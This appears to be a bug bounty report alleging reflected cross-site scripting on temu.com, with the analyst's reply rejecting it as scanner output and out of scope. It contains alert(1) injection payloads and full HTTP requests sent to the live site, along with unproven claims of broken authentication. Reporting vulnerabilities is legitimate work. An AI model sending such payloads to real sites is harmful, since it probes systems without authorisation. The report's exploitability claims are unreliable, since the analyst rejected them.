Xss Temu Report
attacker to inject malicious code into a website, which is then executed by the
victim's browser. This happens when the website includes untrusted user input in
its pages without proper validation or encoding. The attacker crafts a special link
or form that, when clicked or submitted by the victim, causes the victim's browser
to execute the malicious code. The browser treats the code as part of the website,
allowing the attacker to steal sensitive information or perform other malicious
actions. Even the session tokens are available and can be changed while sending the
link, as the authentication is broken in /login.html.
Background issues:
Reflected cross-site scripting vulnerabilities arise when data is copied from a
request and echoed into the application's immediate response in an unsafe way. An
attacker can use the vulnerability to construct a request that, if issued by
another application user, will cause JavaScript code supplied by the attacker to
execute within the user's browser in the context of that user's session with the
application.
The attacker-supplied code can perform a wide variety of actions, such as stealing
the victim's session token or login credentials, performing arbitrary actions on
the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For
example, the attacker can send a victim a link containing a malicious URL in an
email or instant message. They can submit the link to popular web sites that allow
content authoring, for example in blog comments. And they can create an innocuous
looking web site that causes anyone viewing it to make arbitrary cross-domain
requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the
nature of the vulnerable application, the kinds of data and functionality that it
contains, and the other applications that belong to the same domain and
organization. If the application is used only to display non-sensitive public
content, with no authentication or access control functionality, then a cross-site
scripting flaw may be considered low risk. However, if the same application resides
on a domain that can access cookies for other more security-critical applications,
then the vulnerability could be used to attack those other applications, and so may
be considered high risk. Similarly, if the organization that owns the application
is a likely target for phishing attacks, then the vulnerability could be leveraged
to lend credibility to such attacks, by injecting Trojan functionality into the
vulnerable application and exploiting users' trust in the organization in order to
capture credentials for other applications that it owns. In many kinds of
application, such as those providing online banking functionality, cross-site
scripting should always be considered high risk.
Steps To Reproduce:
To exploit this vulnerability, an attacker would need to craft a link that contains
the malicious JavaScript code. The attacker would then need to trick the user into
clicking the link, which would cause the code to be executed. This could be done
through social engineering tactics such as phishing emails or instant messaging, or
through other means.
Payloads used:
cef6j'-alert(1)-'c8ipm
t48kx'-alert(1)-'s29z6
Classification:
CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site
Scripting')
CWE-80: Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic
XSS)
CWE-116: Improper Encoding or Escaping of Output
CWE-159: Failure to Sanitize Special Element
CAPEC-591: Reflected XSS
Requests sent:
GET /robots.txt?cef6j'-alert(1)-'c8ipm=1 HTTP/2
Host: www.temu.com
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/121.0.6167.160 Safari/537.36
Connection: close
Cache-Control: max-age=0
GET /robots.txtt48kx'-alert(1)-'s29z6 HTTP/2
Host: www.temu.com
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/121.0.6167.160 Safari/537.36
Connection: close
Cache-Control: max-age=0
Responses I get:
In both cases the response body is an obfuscated script, and the request path, with
the payload in it, is reflected verbatim inside that script's string array.
HTTP/2 200 OK
Date: Mon, 29 Apr 2024 01:24:23 GMT
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Cip: 47.11.194.2
Cf-Cache-Status: DYNAMIC
Set-Cookie: __cf_bm=LQMnTD_MoUaJsVgkYEap5pGijiPAXv4M4vst_Qep.t4-1714353863-1.0.1.1-tjc4AyoinAtNtQd7o_7MFUMJ3dyf2I4lOhDTsq.6VIWorPEt17swBrwwfvq1WT1SFACCl.8HlQnwFECVMlfWRg; path=/; expires=Mon, 29-Apr-24 01:54:23 GMT; domain=.temu.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
Cf-Ray: 87bb7dfcd8b494be-CCU
Alt-Svc: h3=":443"; ma=86400
HTTP/2 200 OK
Date: Mon, 29 Apr 2024 01:30:08 GMT
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Cip: 47.11.194.2
Cf-Cache-Status: DYNAMIC
Set-Cookie: __cf_bm=4dkZEUoFFl5br2NqG7Olag8ZwvCvHCKxqd4exmjcH5c-1714354208-1.0.1.1-CjmOveTdVaNthOsFTx6Gk2ZGpvq21ZRFdWlgrw6d1KE.lhwZ3oHGv0Ke_Ion0mPvcrg0dqPwA_iPpcZYDDOutA; path=/; expires=Mon, 29-Apr-24 02:00:08 GMT; domain=.temu.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
Cf-Ray: 87bb866bcac094b2-CCU
Alt-Svc: h3=":443"; ma=86400
Impact
If an attacker can control a script that is executed in the victim's browser, then
they can typically fully compromise that user. Amongst other things, the attacker
can perform any action within the application that the user can perform.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary
JavaScript into the application's response.
2 attachments:
F3229903: Screenshot_2024-04-28_213341.png
F3229904: Screenshot_2024-04-28_213404.png
h1_analyst_enzo
Hi @geiuhg3495,
Thank you for all the efforts you put into writing this report, however, please
note that automated vulnerability scanners commonly have low priority issues and/or
false positives. Before submitting the results from a scanner, please take a moment
to confirm that the reported issues are valid and exploitable with business impact.
For any scenario to be accepted as a practical security vulnerability you need to
demonstrate the security issue along with a working proof-of-concept. Moreover,
please note DOM and Reflected XSS issues are OOS for this program.
Regards,
@h1_analyst_enzo